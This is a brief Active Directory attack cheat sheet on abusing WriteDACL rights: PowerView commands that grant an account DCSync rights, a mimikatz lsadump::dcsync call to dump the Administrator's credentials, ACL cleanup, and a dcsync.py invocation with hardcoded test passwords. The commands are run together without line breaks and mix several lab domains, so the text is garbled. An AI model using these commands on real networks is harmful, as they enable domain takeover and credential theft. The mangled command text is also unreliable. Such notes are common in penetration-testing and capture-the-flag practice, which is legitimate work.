WriteDACL Rights
Windows abuse
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)Add-DomainObjectAcl -TargetIdentity HTB.LOCAL -Rights DCSync -Principalidentity svc-alfrescolsadump::dcsync /domain:testlab.local /user:AdministratorRemove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync./dcsync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' n00pyAdministrator:Password123